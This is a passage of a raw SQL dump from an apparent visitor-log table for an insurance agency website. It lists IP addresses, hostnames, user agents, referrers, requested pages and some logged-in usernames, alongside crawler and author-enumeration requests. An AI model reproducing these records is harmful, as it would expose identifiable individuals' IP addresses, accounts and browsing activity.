12','us','','','','','','','0','0',0),(28403,'0b_4a7cdc209e72ca88bbb693c3118de667','1463002335','67.207.163.94','67.207.163.94-unallocated.colocationamerica.com','/?page_id=169','Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Linux','Firefox 28','us','','','','','','','3','0',0),(28404,'0b_7f82e92facf874cd04d2e17d5d9a47c9','1463002329','12.180.55.27','12.180.55.27','/insentives/','Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'WinXP','Firefox 21','us','','','','','','','0','0',0),(28407,'0b_3d678e29b529628abf57246a4304682d','1463002340','207.195.228.118','207-195-228-118.static.webcoretech.com','/forms/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','','',0,'MacOSX','Chrome 37','us','','','','','','','0','0',0),(28410,'0b_6ff6271b9d638712d23bb062e88f7548','1463002340','89.144.31.235','89.144.31.235','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.9.181 Version/12.00','','',0,'Win7','Opera 9','us','','','','','','','0','0',0),(28413,'0b_68a9806717019ec39ea50bfdb3a80084','1463002343','212.69.169.57','212.69.169.57','/register/','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27','','',0,'MacOSX','Safari 5','us','','','','','','','0','0',0),(28415,'0b_3dbe3c021ef8e32b26ee7848cd69c165','1463002349','66.160.179.94','66.160.179.94','/?p=290','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0','','',0,'Linux','Firefox 21','us','','','','','','','0','0',0),(28418,'0b_677c6c8e54140fd86b0feda6b5eb281f','1463002360','185.15.95.136','reverse.lightup.net','/agent-tools/feed/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0','','',0,'Win7 x64','Firefox 22','us','','','','','','','0','0',0),(28419,'0b_fbe47b57ca6a3ec67adec2013a44dca8','1463002353','149.5.113.139','149.5.113.139','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00','','',0,'Win2003','Opera 12','us','','','','','','','0','0',0),(28422,'0b_da1b34e98b1dd97e752eb560f1501a7f','1463002366','12.180.55.209','12.180.55.209','/?p=288','Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0','','',0,'Win8 x64','Firefox 21','us','','','','','','','0','0',0),(28425,'0b_97caee4ea79e445106d638ef823c363f','1463002375','71.35.178.232','71-35-178-232.tukw.qwest.net','/carriers/feed/','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)','','',0,'WinVista x64','IE 9','us','','','','','','','0','0',0),(28428,'0b_f791cda6dbdad0d839966223962e32f7','1463002378','85.93.25.195','host27.bossinvestment.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Linux','Firefox 28','us','','','','','','','0','0',0),(28431,'0b_e79fe61a82f2b0c01d9f7c085d5d5c0f','1463002362','107.155.197.87','107.155.197.87','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27','','',0,'MacOSX','Safari 5','us','','','','','','','0','0',0),(28433,'0b_ab25c2f64f4d7e47e0e6b13accf74d9d','1463002388','206.217.206.177','noptr.midphase.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3','','',0,'MacOSX','Safari 7534','us','','','','','','','0','0',0),(28436,'0b_d017aa5435266c7fb4fc513ac7c1e0ea','1463002379','207.195.235.8','207.195.235.8','/contact/feed/','Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','','',0,'OpenBSD','Chrome 36','us','','','','','','','0','0',0),(28437,'0b_421fbbc5f0529acfb35502e5a4c18456','1463002391','23.239.167.185','23.239.167.185','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11','','',0,'WinXP','Opera 11','us','','','','','','','0','0',0),(28439,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002946','207.131.251.18','unspec207131.honda.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwjksZXO_tLMAhUKy2MKHWK3A88QFggyMAc&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28442,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002949','207.131.251.18','unspec207131.honda.com','/home/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28445,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002949','207.131.251.18','unspec207131.honda.com','/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28446,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002949','207.131.251.18','unspec207131.honda.com','/comments/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28449,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002949','207.131.251.18','unspec207131.honda.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28451,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002965','207.131.251.18','unspec207131.honda.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28454,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002966','207.131.251.18','unspec207131.honda.com','/contact/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/contact/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28457,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002966','207.131.251.18','unspec207131.honda.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/contact/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','51',0),(28458,'0b_5187edb7f772e5fdc6f4dae111311a71','1463002988','207.131.251.18','unspec207131.honda.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1778 x 1000','','','','','','0','0',0),(28461,'0b_2b77c80670faad593273317f1c7ff5d6','1463003324','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28463,'0b_2b77c80670faad593273317f1c7ff5d6','1463003325','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28464,'0b_b91d25f5b31fc5a47764c6f6ae14d686','1463003620','206.210.17.33','proxy3.newyorklife.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1024 x 768','','','','','','0','0',0),(28467,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003621','206.210.17.33','proxy3.newyorklife.com','/comments/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28469,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003624','206.210.17.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28472,'0b_b91d25f5b31fc5a47764c6f6ae14d686','1463003625','206.210.17.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1024 x 768','','','','','','0','0',0),(28475,'0b_b91d25f5b31fc5a47764c6f6ae14d686','1463003628','206.210.17.33','proxy3.newyorklife.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1024 x 768','','','','','','0','0',0),(28476,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003629','206.210.17.33','proxy3.newyorklife.com','/agent-tools/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28479,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003629','206.210.17.33','proxy3.newyorklife.com','/agent-tools/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28482,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003629','206.210.17.33','proxy3.newyorklife.com','/?p=181','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28484,'0b_b91d25f5b31fc5a47764c6f6ae14d686','1463003656','206.210.17.33','proxy3.newyorklife.com','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1024 x 768','','','','hermankatz','','0','51',0),(28487,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003656','206.210.17.33','proxy3.newyorklife.com','/underwriting-search/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28488,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003656','206.210.17.33','proxy3.newyorklife.com','/underwriting-search/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28490,'0b_a729909df7b8dcab26fda8bb4437c0ef','1463003657','206.210.17.33','proxy3.newyorklife.com','/?p=313','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(28493,'0b_105f64e4d48ca4e4bfa5c5e556ba453b','1463005100','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28494,'0b_dccdbd36afc77db300784443eae94cd1','1463005634','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28497,'0b_14117ebc80114a575f2988d51228fc46','1463006856','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(28500,'0b_14117ebc80114a575f2988d51228fc46','1463006867','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(28503,'0b_14117ebc80114a575f2988d51228fc46','1463006912','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(28506,'0b_14117ebc80114a575f2988d51228fc46','1463006925','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(28509,'0b_e2c35ad8f822a5362acd80eb275c4994','1463007217','208.115.111.66','208-115-111-66-reverse.wowrack.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28512,'0b_3914c668767e95ed5eb2cc1631a414bc','1463007365','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28515,'0b_dad9a7a52e03b318bbee9d1e691ef2f2','1463008446','100.43.81.146','spider-100-43-81-146.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(28518,'0b_daf621e085c2a4d32568a41906e99776','1463008446','199.21.99.194','spider-199-21-99-194.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(28520,'0b_5a27dcaf0d704d270ecb6848b7690bac','1463009972','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28521,'0b_fcc9589d06cf1de4122a51a86ff79f8b','1463011120','155.133.82.87','155.133.82.87','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11','','',0,'WinXP','Firefox 2','it','','','','','','','0','0',0),(28524,'0b_e933b21a70e6ecf6b982073697a3ed6c','1463013107','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)','http://www.replica-watch.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(28527,'0b_99cf3bab6580b1657366d8bd72564b12','1463015953','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28529,'0b_efc5e995e143c225ebd7a1470e0bc9e1','1463016912','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)','http://ideibiznesa2015.ru/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(28530,'0b_d5d290314590a0ee002e95bfac3d0d69','1463018297','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(28532,'0b_5816cbe15a92dbe2384f32a919647c20','1463019269','42.96.140.102','IZ28CSJJOMJZ','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(28533,'0b_98dde4cac523543fef50a0f5aff89666','1463019272','66.249.66.14','crawl-66-249-66-14.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28536,'0b_5816cbe15a92dbe2384f32a919647c20','1463019269','42.96.140.102','IZ28CSJJOMJZ','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(28539,'0b_5816cbe15a92dbe2384f32a919647c20','1463019275','42.96.140.102','IZ28CSJJOMJZ','/?author=3','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(28542,'0b_5816cbe15a92dbe2384f32a919647c20','1463019277','42.96.140.102','IZ28CSJJOMJZ','/?author=4','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(28545,'0b_98dde4cac523543fef50a0f5aff89666','1463019307','66.249.66.12','crawl-66-249-66-12.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28548,'0b_495d1fbac948cfc490daee43c8fe2e5d','1463021256','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(28551,'0b_7f4fa152ceabbfd85c454427ce724453','1463021278','180.76.15.25','baiduspider-180-76-15-25.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(28553,'0b_6cdab05c716fd4dc0a12abac77ad7337','1463021304','69.197.177.50','server.2share.tv','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(28554,'0b_6cdab05c716fd4dc0a12abac77ad7337','1463021306','69.197.177.50','server.2share.tv','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(28556,'0b_6cdab05c716fd4dc0a12abac77ad7337','1463021307','69.197.177.50','server.2share.tv','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(28559,'0b_6cdab05c716fd4dc0a12abac77ad7337','1463021309','69.197.177.50','server.2share.tv','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(28562,'0b_6cdab05c716fd4dc0a12abac77ad7337','1463021311','69.197.177.50','server.2share.tv','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(28565,'0b_6cdab05c716fd4dc0a12abac77ad7337','1463021315','69.197.177.50','server.2share.tv','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(28568,'0b_29e9144e4b5fdcd487e17ac525751afb','1463021442','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28571,'0b_8ee4ca8cdee9dda8cd5d6c5e34f42b07','1463023826','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(28572,'0b_06834fea7d7ac1df6a1630f96a0b2249','1463023834','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(28575,'0b_06834fea7d7ac1df6a1630f96a0b2249','1463023836','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(28578,'0b_06834fea7d7ac1df6a1630f96a0b2249','1463023839','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(28580,'0b_06834fea7d7ac1df6a1630f96a0b2249','1463023860','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(28583,'0b_ef552dcb65403eda13100e0352dea408','1463023886','40.77.167.94','msnbot-40-77-167-94.search.msn.com','[404] /pdf/axa_accepts_your_smokers.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28586,'0b_a75c71c2e68dafa263294ca3c38217e8','1463023898','207.46.13.81','msnbot-207-46-13-81.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28587,'0b_06834fea7d7ac1df6a1630f96a0b2249','1463023964','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(28589,'0b_06834fea7d7ac1df6a1630f96a0b2249','1463023972','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(28592,'0b_712abd726eca4519a3c75988c1f2a1aa','1463024654','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)','http://saitevpatorii.com/','',0,'Win2000','IE 5','','','','','','','','0','0',0),(28595,'0b_99599e90be77a9c24786ab7f32834d77','1463024654','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)','http://runstocks.com/','',0,'WinNT 4.0','IE 5','','','','','','','','0','0',0),(28596,'0b_d5bb2fd379aac9b5237670a5fe134a54','1463025227','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28598,'0b_72de64b9b7a45252b2f179297e9087ba','1463027123','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28601,'0b_4adcedc16a547d6eff6f27a4ab3531da','1463028159','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28604,'0b_d4d3465d8cca56fd7ff3a81e46e98787','1463029874','51.254.121.184','184.ip-51-254-121.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(28607,'0b_d4d3465d8cca56fd7ff3a81e46e98787','1463029877','51.254.121.184','184.ip-51-254-121.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(28610,'0b_68ac8b6be0d39ed4a21897b35f855152','1463031134','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50','http://idc.com.ua/','',0,'WinXP','Opera 8','ru','','','','','','','0','0',0),(28611,'0b_41e0fa049fee83d9de4d05e4be4ed49f','1463031134','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00','http://euronis-free.com/','',0,'WinXP','Opera 8','us','','','','','','','0','0',0),(28613,'0b_a9de633a2e355cb5b0147a3682889c93','1463031461','52.73.133.135','ec2-52-73-133-135.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(28616,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032193','188.143.232.15','188.143.232.15','/agent-tools/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28617,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032227','188.143.232.15','188.143.232.15','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28620,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032237','188.143.232.15','188.143.232.15','/register/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28622,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032248','188.143.232.15','188.143.232.15','/about-us/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28625,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032259','188.143.232.15','188.143.232.15','/insentives/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28628,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032271','188.143.232.15','188.143.232.15','/licensing-contracting/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28631,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032281','188.143.232.15','188.143.232.15','/carriers/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28632,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032295','188.143.232.15','188.143.232.15','/contact/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28635,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032307','188.143.232.15','188.143.232.15','/case-status/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28638,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032317','188.143.232.15','188.143.232.15','/forms/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28640,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032330','188.143.232.15','188.143.232.15','/igo/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28641,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032341','188.143.232.15','188.143.232.15','/term-quotes/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28644,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032351','188.143.232.15','188.143.232.15','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28647,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032364','188.143.232.15','188.143.232.15','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 